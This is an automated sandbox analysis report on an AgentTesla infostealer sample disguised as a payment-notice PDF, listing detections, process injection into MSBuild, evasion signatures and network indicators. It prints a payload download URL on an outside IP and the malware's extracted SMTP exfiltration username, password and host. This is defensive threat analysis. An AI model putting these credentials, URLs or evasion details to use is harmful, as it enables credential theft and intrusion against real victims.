Windows Analysis Report
Aviso de pago.pdf____________________________.exe

Overview

General Information

Sample Name: Aviso de pago.pdf____________________________.exe
Analysis ID: 626184
MD5: 05b6b97166b339557424ca035418a640
SHA1: e1699c9c10d6807650fcc35fc76c7744deeb16be
SHA256: 6797c9eb17e1ad3b41121bc80db0a97ae642bfca0874c8b7bd391507d2ca5540
Tags: agentteslaexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Aviso de pago.pdf____________________________.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe" MD5: 05B6B97166B339557424CA035418A640)
    • cmd.exe (PID: 6360 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 15 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5836 cmdline: timeout 15 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • MSBuild.exe (PID: 3272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "danny@permagraf.com.mx", "Password": "icui4cu2@@", "Host": "mail.permagraf.com.mx"}
Source | Rule | Description | Author | Strings
00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 16 entries shown)

Source | Rule | Description | Author | Strings
0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x2e6d4:$s1: get_kbok
  • 0x2f008:$s2: get_CHoo
  • 0x2fc63:$s3: set_passwordIsSet
  • 0x2e4d8:$s4: get_enableLog
  • 0x32b81:$s8: torbrowser
  • 0x3155d:$s10: logins
  • 0x30ed5:$s11: credential
  • 0x2d8c1:$g1: get_Clipboard
  • 0x2d8cf:$g2: get_Keyboard
  • 0x2d8dc:$g3: get_Password
  • 0x2eeb6:$g4: get_CtrlKeyDown
  • 0x2eec6:$g5: get_ShiftKeyDown
  • 0x2eed7:$g6: get_AltKeyDown
12.0.MSBuild.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
12.0.MSBuild.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(5 of 26 entries shown)
                    No Sigma rule has matched
Source IP: 195.133.18.171
Destination IP: 192.168.2.6
Timestamp: 05/13/22-17:18:49.165848
SID: 2848901
Source Port: 80
Destination Port: 49763
Protocol: TCP
Classtype: A Network Trojan was detected

                    AV Detection

Source: 12.0.MSBuild.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "danny@permagraf.com.mx", "Password": "icui4cu2@@", "Host": "mail.permagraf.com.mx"}
Source: Aviso de pago.pdf____________________________.exe | ReversingLabs: Detection: 24%
Source: http://195.133.18.171 | Avira URL Cloud: Label: malware
Source: http://195.133.18.171/Znmtganqo_Wvetpunc.jpgT | Avira URL Cloud: Label: malware
Source: http://195.133.18.171/Znmtganqo_Wvetpunc.jpg | Avira URL Cloud: Label: malware
Source: http://195.133.18.171 | Virustotal: Detection: 17%
Source: Aviso de pago.pdf____________________________.exe | Joe Sandbox ML: detected
Source: 12.0.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 12.0.MSBuild.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 12.0.MSBuild.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 12.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 12.0.MSBuild.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 12.0.MSBuild.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: Aviso de pago.pdf____________________________.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Aviso de pago.pdf____________________________.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: protobuf-net.pdbSHA256 source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h]
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh

                    Networking

Source: Traffic | Snort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 195.133.18.171:80 -> 192.168.2.6:49763
Source: Yara match | File source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | ASN Name: AS-REGRU AS-REGRU
Source: global traffic | HTTP traffic detected: GET /Znmtganqo_Wvetpunc.jpg HTTP/1.1 Host: 195.133.18.171 Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 195.133.18.171 195.133.18.171
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.3
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.133
Source: unknown | TCP traffic detected without corresponding DNS query: 195.133.18.171
Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://195.133.18.171
Source: Aviso de pago.pdf____________________________.exe | String found in binary or memory: http://195.133.18.171/Znmtganqo_Wvetpunc.jpg
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://195.133.18.171/Znmtganqo_Wvetpunc.jpgT
Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://WPfLXV.com
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                    System Summary

Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: initial sample | Static PE information: Filename: Aviso de pago.pdf____________________________.exe
Source: 12.0.MSBuild.exe.400000.0.unpack, <PrivateImplementationDetails>{DDFF07F3-CE57-4C09-A970-38E9328FA8D8}/0BCA6C18-22C5-4E81-A07E-D299400C5A1B.cs | Large array initialization: .cctor: array initializer size 11790
Source: 12.2.MSBuild.exe.400000.0.unpack, <PrivateImplementationDetails>{DDFF07F3-CE57-4C09-A970-38E9328FA8D8}/0BCA6C18-22C5-4E81-A07E-D299400C5A1B.cs | Large array initialization: .cctor: array initializer size 11790
Source: Aviso de pago.pdf____________________________.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_00E94A78
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_0496B5C0
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04968D68
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04962010
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04966868
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04963108
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04965280
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04965A18
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04966B10
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_04962350
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_05998D36
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_05994300
Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Code function: 0_2_048D0CB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_050346A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05033D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05034672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05034690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05F26920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05F27538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05F290F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_05F26C68
Source: Aviso de pago.pdf____________________________.exe | Binary or memory string: OriginalFilename vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearquajyuPCWUPvLWdHsfqSDDcyRGxRBVFTw.exe4 vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.486069682.00000000088AB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearquajyuPCWUPvLWdHsfqSDDcyRGxRBVFTw.exe4 vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.482976208.00000000077E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: get_OriginalFilename vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.482115591.0000000006B50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNkrnkvsubxsztkgs.dll" vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000000.361902808.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZnmtganqo.exe" vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearquajyuPCWUPvLWdHsfqSDDcyRGxRBVFTw.exe4 vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000003.468147986.0000000007EFA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: get_OriginalFilename vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe | Binary or memory string: OriginalFilenameZnmtganqo.exe" vs Aviso de pago.pdf____________________________.exe
Source: Aviso de pago.pdf____________________________.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Section loaded: windows.staterepositoryps.dll
                    Source: Aviso de pago.pdf____________________________.exe | ReversingLabs: Detection: 24%
                    Source: Aviso de pago.pdf____________________________.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe "C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe"
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 15
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Aviso de pago.pdf____________________________.exe.log
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/1@0/1
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_01
                    Source: 12.0.MSBuild.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 12.2.MSBuild.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Aviso de pago.pdf____________________________.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Aviso de pago.pdf____________________________.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                    Source: Aviso de pago.pdf____________________________.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: protobuf-net.pdbSHA256 source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: Aviso de pago.pdf____________________________.exe, Google.cs | .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.Aviso de pago.pdf____________________________.exe.5d0000.0.unpack, Google.cs | .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
